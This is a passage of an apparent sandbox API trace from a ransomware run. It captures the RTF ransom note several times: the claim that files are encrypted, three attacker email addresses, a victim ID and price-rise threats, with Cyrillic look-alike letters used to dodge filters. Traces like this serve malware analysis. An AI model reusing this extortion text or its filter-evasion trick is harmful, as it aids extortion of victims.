f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0168.481] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2667868, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¼\x9d]\x1a@\x16I\x97\x04\x1bb£Ú4ç\x94|¦4²\x81z\x09ÂO§{îöe\x91«\x88·Ìaù*Q\x94\x97sqßü\x19|\x1cñJY\x16\x82\x11¶Ïkp\x80iÙ\x9f\x07Xþ\x8fXã÷vò¶\x1fË®%[6tý¯\x8a1>\x9c?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0090.384] GetLastError () returned 0x0 [0090.384] SetLastError (dwErrCode=0x0) [0090.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0090.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, 